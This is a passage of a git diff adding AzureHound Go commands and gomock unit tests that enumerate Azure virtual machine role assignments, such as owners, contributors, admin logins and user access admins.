listVirtualMachineAdminLoginsCmdImpl, + SilenceUsage: true, +} + +func listVirtualMachineAdminLoginsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure virtual machine admin logins...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + vms := listVirtualMachines(ctx, azClient, subscriptions) + vmRoleAssignments := listVirtualMachineRoleAssignments(ctx, azClient, vms) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + stream := listVirtualMachineAdminLogins(ctx, vmRoleAssignments) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listVirtualMachineAdminLogins( + ctx context.Context, + roleAssignments <-chan azureWrapper[models.VirtualMachineRoleAssignments], +) <-chan any { + return pipeline.Map(ctx.Done(), roleAssignments, func(ra azureWrapper[models.VirtualMachineRoleAssignments]) any { + filteredAssignments := internal.Filter(ra.Data.RoleAssignments, vmRoleAssignmentFilter(constants.VirtualMachineAdministratorLoginRoleID)) + adminLogins := internal.Map(filteredAssignments, func(ra models.VirtualMachineRoleAssignment) models.VirtualMachineAdminLogin { + return models.VirtualMachineAdminLogin{ + VirtualMachineId: ra.VirtualMachineId, + AdminLogin: ra.RoleAssignment, + } + }) + return NewAzureWrapper(enums.KindAZVMAdminLogin, models.VirtualMachineAdminLogins{ + VirtualMachineId: ra.Data.VirtualMachineId, + AdminLogins: adminLogins, + }) + }) +} diff --git a/cmd/list-virtual-machine-admin-logins_test.go b/cmd/list-virtual-machine-admin-logins_test.go new file mode 100644 index 0000000..df29f72 --- /dev/null +++ b/cmd/list-virtual-machine-admin-logins_test.go @@ -0,0 +1,76 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListVirtualMachineAdminLogins(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockVMRoleAssignmentsChannel := make(chan azureWrapper[models.VirtualMachineRoleAssignments]) + mockTenant := azure.Tenant{} + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + channel := listVirtualMachineAdminLogins(ctx, mockVMRoleAssignmentsChannel) + + go func() { + defer close(mockVMRoleAssignmentsChannel) + + mockVMRoleAssignmentsChannel <- NewAzureWrapper( + enums.KindAZVMRoleAssignment, + models.VirtualMachineRoleAssignments{ + VirtualMachineId: "foo", + RoleAssignments: []models.VirtualMachineRoleAssignment{ + { + RoleAssignment: azure.RoleAssignment{ + Name: constants.VirtualMachineAdministratorLoginRoleID, + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.VirtualMachineAdministratorLoginRoleID, + }, + }, + }, + }, + }, + ) + }() + + if _, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-virtual-machine-avere-contributors.go b/cmd/list-virtual-machine-avere-contributors.go new file mode 100644 index 0000000..577582d --- /dev/null +++ b/cmd/list-virtual-machine-avere-contributors.go @@ -0,0 +1,81 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/internal" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listVirtualMachineAvereContributorsCmd) +} + +var listVirtualMachineAvereContributorsCmd = &cobra.Command{ + Use: "virtual-machine-avere-contributors", + Long: "Lists Azure Virtual Machine Avere Contributors", + Run: listVirtualMachineAvereContributorsCmdImpl, + SilenceUsage: true, +} + +func listVirtualMachineAvereContributorsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure virtual machine averecontributors...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + vms := listVirtualMachines(ctx, azClient, subscriptions) + vmRoleAssignments := listVirtualMachineRoleAssignments(ctx, azClient, vms) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + stream := listVirtualMachineAvereContributors(ctx, vmRoleAssignments) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listVirtualMachineAvereContributors( + ctx context.Context, + roleAssignments <-chan azureWrapper[models.VirtualMachineRoleAssignments], +) <-chan any { + return pipeline.Map(ctx.Done(), roleAssignments, func(ra azureWrapper[models.VirtualMachineRoleAssignments]) any { + filteredAssignments := internal.Filter(ra.Data.RoleAssignments, vmRoleAssignmentFilter(constants.AvereContributorRoleID)) + avereContributors := internal.Map(filteredAssignments, func(ra models.VirtualMachineRoleAssignment) models.VirtualMachineAvereContributor { + return models.VirtualMachineAvereContributor{ + VirtualMachineId: ra.VirtualMachineId, + AvereContributor: ra.RoleAssignment, + } + }) + return NewAzureWrapper(enums.KindAZVMAvereContributor, models.VirtualMachineAvereContributors{ + VirtualMachineId: ra.Data.VirtualMachineId, + AvereContributors: avereContributors, + }) + }) +} diff --git a/cmd/list-virtual-machine-avere-contributors_test.go b/cmd/list-virtual-machine-avere-contributors_test.go new file mode 100644 index 0000000..b894045 --- /dev/null +++ b/cmd/list-virtual-machine-avere-contributors_test.go @@ -0,0 +1,76 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListVirtualMachineAvereContributors(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockVMRoleAssignmentsChannel := make(chan azureWrapper[models.VirtualMachineRoleAssignments]) + mockTenant := azure.Tenant{} + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + channel := listVirtualMachineAvereContributors(ctx, mockVMRoleAssignmentsChannel) + + go func() { + defer close(mockVMRoleAssignmentsChannel) + + mockVMRoleAssignmentsChannel <- NewAzureWrapper( + enums.KindAZVMRoleAssignment, + models.VirtualMachineRoleAssignments{ + VirtualMachineId: "foo", + RoleAssignments: []models.VirtualMachineRoleAssignment{ + { + RoleAssignment: azure.RoleAssignment{ + Name: constants.AvereContributorRoleID, + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.AvereContributorRoleID, + }, + }, + }, + }, + }, + ) + }() + + if _, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-virtual-machine-contributors.go b/cmd/list-virtual-machine-contributors.go new file mode 100644 index 0000000..bcc6abf --- /dev/null +++ b/cmd/list-virtual-machine-contributors.go @@ -0,0 +1,81 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/internal" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listVirtualMachineContributorsCmd) +} + +var listVirtualMachineContributorsCmd = &cobra.Command{ + Use: "virtual-machine-contributors", + Long: "Lists Azure Virtual Machine Contributors", + Run: listVirtualMachineContributorsCmdImpl, + SilenceUsage: true, +} + +func listVirtualMachineContributorsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure virtual machine contributors...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + vms := listVirtualMachines(ctx, azClient, subscriptions) + vmRoleAssignments := listVirtualMachineRoleAssignments(ctx, azClient, vms) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + stream := listVirtualMachineContributors(ctx, vmRoleAssignments) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listVirtualMachineContributors( + ctx context.Context, + roleAssignments <-chan azureWrapper[models.VirtualMachineRoleAssignments], +) <-chan any { + return pipeline.Map(ctx.Done(), roleAssignments, func(ra azureWrapper[models.VirtualMachineRoleAssignments]) any { + filteredAssignments := internal.Filter(ra.Data.RoleAssignments, vmRoleAssignmentFilter(constants.ContributorRoleID)) + contributors := internal.Map(filteredAssignments, func(ra models.VirtualMachineRoleAssignment) models.VirtualMachineContributor { + return models.VirtualMachineContributor{ + VirtualMachineId: ra.VirtualMachineId, + Contributor: ra.RoleAssignment, + } + }) + return NewAzureWrapper(enums.KindAZVMContributor, models.VirtualMachineContributors{ + VirtualMachineId: ra.Data.VirtualMachineId, + Contributors: contributors, + }) + }) +} diff --git a/cmd/list-virtual-machine-contributors_test.go b/cmd/list-virtual-machine-contributors_test.go new file mode 100644 index 0000000..3b13458 --- /dev/null +++ b/cmd/list-virtual-machine-contributors_test.go @@ -0,0 +1,76 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListVirtualMachineContributors(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockVMRoleAssignmentsChannel := make(chan azureWrapper[models.VirtualMachineRoleAssignments]) + mockTenant := azure.Tenant{} + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + channel := listVirtualMachineContributors(ctx, mockVMRoleAssignmentsChannel) + + go func() { + defer close(mockVMRoleAssignmentsChannel) + + mockVMRoleAssignmentsChannel <- NewAzureWrapper( + enums.KindAZVMRoleAssignment, + models.VirtualMachineRoleAssignments{ + VirtualMachineId: "foo", + RoleAssignments: []models.VirtualMachineRoleAssignment{ + { + RoleAssignment: azure.RoleAssignment{ + Name: constants.ContributorRoleID, + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.ContributorRoleID, + }, + }, + }, + }, + }, + ) + }() + + if _, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-virtual-machine-owners.go b/cmd/list-virtual-machine-owners.go new file mode 100644 index 0000000..62edcf3 --- /dev/null +++ b/cmd/list-virtual-machine-owners.go @@ -0,0 +1,81 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/internal" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listVirtualMachineOwnersCmd) +} + +var listVirtualMachineOwnersCmd = &cobra.Command{ + Use: "virtual-machine-owners", + Long: "Lists Azure Virtual Machine Owners", + Run: listVirtualMachineOwnersCmdImpl, + SilenceUsage: true, +} + +func listVirtualMachineOwnersCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure virtual machine owners...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + vms := listVirtualMachines(ctx, azClient, subscriptions) + vmRoleAssignments := listVirtualMachineRoleAssignments(ctx, azClient, vms) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + stream := listVirtualMachineOwners(ctx, vmRoleAssignments) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listVirtualMachineOwners( + ctx context.Context, + roleAssignments <-chan azureWrapper[models.VirtualMachineRoleAssignments], +) <-chan any { + return pipeline.Map(ctx.Done(), roleAssignments, func(ra azureWrapper[models.VirtualMachineRoleAssignments]) any { + filteredAssignments := internal.Filter(ra.Data.RoleAssignments, vmRoleAssignmentFilter(constants.OwnerRoleID)) + owners := internal.Map(filteredAssignments, func(ra models.VirtualMachineRoleAssignment) models.VirtualMachineOwner { + return models.VirtualMachineOwner{ + VirtualMachineId: ra.VirtualMachineId, + Owner: ra.RoleAssignment, + } + }) + return NewAzureWrapper(enums.KindAZVMOwner, models.VirtualMachineOwners{ + VirtualMachineId: ra.Data.VirtualMachineId, + Owners: owners, + }) + }) +} diff --git a/cmd/list-virtual-machine-owners_test.go b/cmd/list-virtual-machine-owners_test.go new file mode 100644 index 0000000..d4a403e --- /dev/null +++ b/cmd/list-virtual-machine-owners_test.go @@ -0,0 +1,76 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListVirtualMachineOwners(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockVMRoleAssignmentsChannel := make(chan azureWrapper[models.VirtualMachineRoleAssignments]) + mockTenant := azure.Tenant{} + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + channel := listVirtualMachineOwners(ctx, mockVMRoleAssignmentsChannel) + + go func() { + defer close(mockVMRoleAssignmentsChannel) + + mockVMRoleAssignmentsChannel <- NewAzureWrapper( + enums.KindAZVMRoleAssignment, + models.VirtualMachineRoleAssignments{ + VirtualMachineId: "foo", + RoleAssignments: []models.VirtualMachineRoleAssignment{ + { + RoleAssignment: azure.RoleAssignment{ + Name: constants.OwnerRoleID, + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.OwnerRoleID, + }, + }, + }, + }, + }, + ) + }() + + if _, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-virtual-machine-role-assignments.go b/cmd/list-virtual-machine-role-assignments.go new file mode 100644 index 0000000..1057283 --- /dev/null +++ b/cmd/list-virtual-machine-role-assignments.go @@ -0,0 +1,129 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listVirtualMachineRoleAssignmentsCmd) +} + +var listVirtualMachineRoleAssignmentsCmd = &cobra.Command{ + Use: "virtual-machine-role-assignments", + Long: "Lists Virtual Machine Role Assignments", + Run: listVirtualMachineRoleAssignmentsCmdImpl, + SilenceUsage: true, +} + +func listVirtualMachineRoleAssignmentsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure virtual machine role assignments...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + stream := listVirtualMachineRoleAssignments(ctx, azClient, listVirtualMachines(ctx, azClient, subscriptions)) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listVirtualMachineRoleAssignments(ctx context.Context, client client.AzureClient, virtualMachines <-chan interface{}) <-chan azureWrapper[models.VirtualMachineRoleAssignments] { + var ( + out = make(chan azureWrapper[models.VirtualMachineRoleAssignments]) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), virtualMachines) { + if virtualMachine, ok := result.(AzureWrapper).Data.(models.VirtualMachine); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating virtual machine role assignments", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, virtualMachine.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + virtualMachineRoleAssignments = models.VirtualMachineRoleAssignments{ + VirtualMachineId: id, + } + count = 0 + ) + for item := range client.ListRoleAssignmentsForResource(ctx, id, "", "") { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing role assignments for this virtual machine", "virtualMachineId", id) + } else { + virtualMachineRoleAssignment := models.VirtualMachineRoleAssignment{ + VirtualMachineId: id, + RoleAssignment: item.Ok, + } + log.V(2).Info("found virtual machine role assignment", "virtualMachineRoleAssignment", virtualMachineRoleAssignment) + count++ + virtualMachineRoleAssignments.RoleAssignments = append(virtualMachineRoleAssignments.RoleAssignments, virtualMachineRoleAssignment) + } + } + if ok := pipeline.Send(ctx.Done(), out, NewAzureWrapper(enums.KindAZVMRoleAssignment, virtualMachineRoleAssignments)); !ok { + return + } + log.V(1).Info("finished listing virtual machine role assignments", "virtualMachineId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all virtual machine role assignments") + }() + + return out +} diff --git a/cmd/list-virtual-machine-role-assignments_test.go b/cmd/list-virtual-machine-role-assignments_test.go new file mode 100644 index 0000000..efd5112 --- /dev/null +++ b/cmd/list-virtual-machine-role-assignments_test.go @@ -0,0 +1,106 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListVirtualMachineRoleAssignments(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockVirtualMachinesChannel := make(chan interface{}) + mockVirtualMachineRoleAssignmentChannel := make(chan client.AzureResult[azure.RoleAssignment]) + mockVirtualMachineRoleAssignmentChannel2 := make(chan client.AzureResult[azure.RoleAssignment]) + + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListRoleAssignmentsForResource(gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any()).Return(mockVirtualMachineRoleAssignmentChannel).Times(1) + mockClient.EXPECT().ListRoleAssignmentsForResource(gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any()).Return(mockVirtualMachineRoleAssignmentChannel2).Times(1) + channel := listVirtualMachineRoleAssignments(ctx, mockClient, mockVirtualMachinesChannel) + + go func() { + defer close(mockVirtualMachinesChannel) + mockVirtualMachinesChannel <- AzureWrapper{ + Data: models.VirtualMachine{}, + } + mockVirtualMachinesChannel <- AzureWrapper{ + Data: models.VirtualMachine{}, + } + }() + go func() { + defer close(mockVirtualMachineRoleAssignmentChannel) + mockVirtualMachineRoleAssignmentChannel <- client.AzureResult[azure.RoleAssignment]{ + Ok: azure.RoleAssignment{ + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.VirtualMachineContributorRoleID, + }, + }, + } + mockVirtualMachineRoleAssignmentChannel <- client.AzureResult[azure.RoleAssignment]{ + Ok: azure.RoleAssignment{ + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.AvereContributorRoleID, + }, + }, + } + }() + go func() { + defer close(mockVirtualMachineRoleAssignmentChannel2) + mockVirtualMachineRoleAssignmentChannel2 <- client.AzureResult[azure.RoleAssignment]{ + Ok: azure.RoleAssignment{ + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.VirtualMachineAdministratorLoginRoleID, + }, + }, + } + mockVirtualMachineRoleAssignmentChannel2 <- client.AzureResult[azure.RoleAssignment]{ + Error: mockError, + } + }() + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if len(result.Data.RoleAssignments) != 2 { + t.Errorf("got %v, want %v", len(result.Data.RoleAssignments), 2) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if len(result.Data.RoleAssignments) != 1 { + t.Errorf("got %v, want %v", len(result.Data.RoleAssignments), 2) + } +} diff --git a/cmd/list-virtual-machine-user-access-admins.go b/cmd/list-virtual-machine-user-access-admins.go new file mode 100644 index 0000000..7b37c59 --- /dev/null +++ b/cmd/list-virtual-machine-user-access-admins.go @@ -0,0 +1,81 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/internal" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listVirtualMachineUserAccessAdminsCmd) +} + +var listVirtualMachineUserAccessAdminsCmd = &cobra.Command{ + Use: "virtual-machine-user-access-admins", + Long: "Lists Azure Virtual Machine User Access Admins", + Run: listVirtualMachineUserAccessAdminsCmdImpl, + SilenceUsage: true, +} + +func listVirtualMachineUserAccessAdminsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure virtual machine user access admins...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + vms := listVirtualMachines(ctx, azClient, subscriptions) + vmRoleAssignments := listVirtualMachineRoleAssignments(ctx, azClient, vms) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + stream := listVirtualMachineUserAccessAdmins(ctx, vmRoleAssignments) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listVirtualMachineUserAccessAdmins( + ctx context.Context, + roleAssignments <-chan azureWrapper[models.VirtualMachineRoleAssignments], +) <-chan any { + return pipeline.Map(ctx.Done(), roleAssignments, func(ra azureWrapper[models.VirtualMachineRoleAssignments]) any { + filteredAssignments := internal.Filter(ra.Data.RoleAssignments, vmRoleAssignmentFilter(constants.UserAccessAdminRoleID)) + uaas := internal.Map(filteredAssignments, func(ra models.VirtualMachineRoleAssignment) models.VirtualMachineUserAccessAdmin { + return models.VirtualMachineUserAccessAdmin{ + VirtualMachineId: ra.VirtualMachineId, + UserAccessAdmin: ra.RoleAssignment, + } + }) + return NewAzureWrapper(enums.KindAZVMUserAccessAdmin, models.VirtualMachineUserAccessAdmins{ + VirtualMachineId: ra.Data.VirtualMachineId, + UserAccessAdmins: uaas, + }) + }) +} diff --git a/cmd/list-virtual-machine-user-access-admins_test.go b/cmd/list-virtual-machine-user-access-admins_test.go new file mode 100644 index 